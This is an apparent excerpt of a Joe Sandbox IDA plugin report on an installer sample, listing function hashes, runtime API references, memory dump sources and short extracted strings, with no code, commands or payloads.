                          • Opcode Fuzzy Hash: 8fe439ec96dfa39ee4d709379168604a75f2081ac48d3e5698b370bb498cc010
                          • Instruction Fuzzy Hash: D8E0B631508209ABCF066F54C90CA893F79FF4539AB148514F805CAA21CB3ADAD6CA50
                          APIs
                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CA166D0
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CA16EF3
                            • Part of subcall function 6CA18199: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CA16EDC,00000000,?,?,?,6CA16EDC,?,6CA4354C), ref: 6CA181F9
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                          • String ID:
                          • API String ID: 915016180-0
                          • Opcode ID: f3d4fea3b4251da722ac47480e13a83cffdc058ad6019f572e8a2aa5c376efa3
                          • Instruction ID: d7021987f08d15c84c9953e2f2dcbb88bd4bd6ac4f50547b72a7f03fc5ad33a6
                          • Opcode Fuzzy Hash: f3d4fea3b4251da722ac47480e13a83cffdc058ad6019f572e8a2aa5c376efa3
                          • Instruction Fuzzy Hash: A1B19E75E182059FDB04CF55C48269DBBB5FB05724F28822AE426E7F80D734D584CFA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmp
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ctype
                          • String ID:
                          • API String ID: 3039457973-3916222277
                          • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                          • Instruction ID: 679261418e53d6aa1b87a41b2d0581d4ece50f5881b072abddc19ddb939c85c8
                          • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                          • Instruction Fuzzy Hash: B403AA34805298DEDF21CBA4CA54BDCBBB1BF15308F24809AD449A7B91DB346ACDDF61
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: @4J$DsL
                          • API String ID: 0-2004129199
                          • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                          • Instruction ID: 530507af2144aebdce9978ff9e677486819e98b6db8fdaaad5b2da7e6b52d306
                          • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                          • Instruction Fuzzy Hash: 2D2171376A49564BD74CCA28DC33EB92680E748305F89527DE94BCB7E1DF5D8840D648
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: YA1
                          • API String ID: 0-613462611
                          • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                          • Instruction ID: 96e1f922b484d3e288bbdbeb76f750c142f34af50cf4eae343553f02a507cc67
                          • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                          • Instruction Fuzzy Hash: 1042D3706083818FD315DF28D4D069ABBE6FFC9308F184A6DE4D5AB752D631D98ACB42
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: __aullrem
                          • String ID:
                          • API String ID: 3758378126-0
                          • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                          • Instruction ID: b57f5caf3db2091ccc57b694c3a2ac16c36331d9631e7f7a21d6a526129b839f
                          • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                          • Instruction Fuzzy Hash: 3551E971A052459BD710CF5EC4C02EEFBF6EF79214F28C05EE88897242D27A599AC760
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID: 0-3916222277
                          • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                          • Instruction ID: ca948720270b889539c5a81bd8708608b5af34a612ec2c59bf2b5b6a9b5457e8
                          • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                          • Instruction Fuzzy Hash: 14029D316083408BD725CF29C99079EBBE2BFC8318F184A2EE4D597B51C7749989CB83
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: x=J
                          • API String ID: 0-1497497802
                          • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                          • Instruction ID: fef6052da47d0ac89575eb2c386701c9cff571d4f08106718554a906d48ba423
                          • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                          • Instruction Fuzzy Hash: 6291EE31D11299DACF04DFA8D9809EDB7B1AF4530CF24C06AE462E7A61DB315ACDCB50
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: (SL
                          • API String ID: 0-669240678
                          • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                          • Instruction ID: c19f4d119415df2f9b8a4e72ea4e06b29a9f8236ba264fc7d31760e8ef3fa3ae
                          • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                          • Instruction Fuzzy Hash: F6518473E208214AD78CCE24DC2177572D2E788310F8BC1B99D8BAB6E6DD78989587D4
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                          • Instruction ID: 89ccad349f80a41e6b82275ec74e4404d34b8de71cff4d3d11623dfa685403da
                          • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                          • Instruction Fuzzy Hash: B1627C71D02259CFDF15CFA5C990BEDBBB1BF04318F14405AE895ABA80D7749A8ACF90
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 36e59002686ab19309f918f3860b747ef88cc1110e88759f7e08e20c8a557b15
                          • Instruction ID: d5d0e88c2888ef8e8df2b8fec3505fb5783154c90d1d5d3654ce6d814a017b56
                          • Opcode Fuzzy Hash: 36e59002686ab19309f918f3860b747ef88cc1110e88759f7e08e20c8a557b15
                          • Instruction Fuzzy Hash: 8D1291713097418FC718CF29C59466AFBE2BFC8344F589A2DE99687B41D731E889CB42
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                          • Instruction ID: 9401c665c1861d00840feba0874de187e5e1ac4721aeed1af4fb664036161070
                          • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                          • Instruction Fuzzy Hash: 52021B31A083128BD319CE2DC484259BBF2FBC4345F1A4B3EE89697A54D774ADC5CB92
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                          • Instruction ID: 70370911e53c3db9d231b740e4e4cf49f57979581d6d4b787a4dfc118e464357
                          • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                          • Instruction Fuzzy Hash: E5F12531A042898BEB24CE2CD8507EEBBE5FBC1304F58453DD889D7B45DB35958ACB91
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                          • Instruction ID: f751c1f52fa3effb3398ee7d8a1fa2efd35bd51ca0d9a2081ac2a0d6c475d771
                          • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                          • Instruction Fuzzy Hash: E3D15471A447128FD318CF1DC4A4236BBE1FF86304F094ABDDAA68B78AD734A555CB42
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 198e3b67c30e49fc889c46f171b82045d2b176faab8633eba47bfa451d0a0751
                          • Instruction ID: 965cfd2ce9079d1416a2a7d58af6dc97f7cfdf0a3236bd7803e740b6b11015c7
                          • Opcode Fuzzy Hash: 198e3b67c30e49fc889c46f171b82045d2b176faab8633eba47bfa451d0a0751
                          • Instruction Fuzzy Hash: 0FB1C3317047094BD324EE79C990BDAB7E9AF84308F04462DD5AAA7B41DF35B98DCB90
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                          • Instruction ID: c4ac30afe20efbfed0273c47d980b2e73720fc5117ec9a68aaa59017ccc615aa
                          • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                          • Instruction Fuzzy Hash: 9BA1D17160C3418FC319CE2DC49069ABBE1AFD5318F584A2DE4D6C7B41DA31E98ACB43
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                          • Instruction ID: 737299f51e54e574b1c32b864232ff6db7ef3c6a515edd8341f95a3554278fee
                          • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                          • Instruction Fuzzy Hash: ED819E35A047058FC320CF29C480696B7E1FF99714F288AADC599DB711E772E986CB82
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                          • Instruction ID: 49616c2058307a70f9bb2cb74fb6574d31ff960aea4e52598df82546a644ead6
                          • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                          • Instruction Fuzzy Hash: 92518D72F006099BDB08CE98D9916ADB7F2EB88304F648169D111E7781D778DA91CB90
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                          • Instruction ID: 09dfabf9161e3f38f21064aedcfd30bb8bca304f36cd91dbf9bf22661e6054ef
                          • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                          • Instruction Fuzzy Hash: 033114277A444117C70CCD3BCD2279F91639BD462A70ECF396C05DEF95D92CC8924148
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                          • Instruction ID: 16c34bcc6ab35ae8ef9c1a1d4ad93cf0dee8bab3b558b1c26b38cbfd6ee6b67f
                          • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                          • Instruction Fuzzy Hash: D1219077320A0647E74C8A38D83737532D1A705318F98A22DEA6BCE2C2D73AC457C385
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87ba13bc127ce662d575616e636eb7e9ddde53d19353a83879f57fb393a55a2d
                          • Instruction ID: 4919a465b58e5c6d03bd1199db1323e4e2b9ba3e4f8d9c16503813f3e65a0105
                          • Opcode Fuzzy Hash: 87ba13bc127ce662d575616e636eb7e9ddde53d19353a83879f57fb393a55a2d
                          • Instruction Fuzzy Hash: DEF03072A15234ABDB12CA48C906B9973B8EB45B65F19009BF9419B640D6B4DD80C7D0
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                          • Instruction ID: c20800ebd133e9ef769cf09eac0a82353ee51b865d976f66d46ac39795941aa0
                          • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                          • Instruction Fuzzy Hash: 5AE08C73912238EBCB10CBC8CA00D8AB3ECFB44A14B29009AB511D3600D274DE44C7C0
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                          • Instruction ID: cd438e156b011fed833174e53e0a553a46ffb3d47b428b5a4554f9cbea0984e4
                          • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                          • Instruction Fuzzy Hash: 9AC08CA312810057C302EA26E8C0BABF6A37360330F268C2EA0A2F7E43C328C0B48111
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA46000, based on PE: true
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                          • API String ID: 0-609671
                          • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                          • Instruction ID: acb89ebf4e84bbbeef31d277c4af4d4d434ae0bd63e08d1142c3ca8c7d5130cc
                          • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                          • Instruction Fuzzy Hash: 2BD1C475A04209EFCB21DFA4DA80BEEB7B5FF4530CF248519E455A3A50DB70A989CB70
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6CA18927
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CA1892F
                          • _ValidateLocalCookies.LIBCMT ref: 6CA189B8
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CA189E3
                          • _ValidateLocalCookies.LIBCMT ref: 6CA18A38
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 82618d593fe3e20e5966296287a8b48f38b7f3bb7516a4477cabc7033054f7c8
                          • Instruction ID: 1867f6727706a01379ef18442257fca1073d5725591ecad2535658d789859368
                          • Opcode Fuzzy Hash: 82618d593fe3e20e5966296287a8b48f38b7f3bb7516a4477cabc7033054f7c8
                          • Instruction Fuzzy Hash: 1B410934E05218AFCF00CFA8C884ADE7BB5AF4635CF198156E8149BF51D735EA89CB91
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
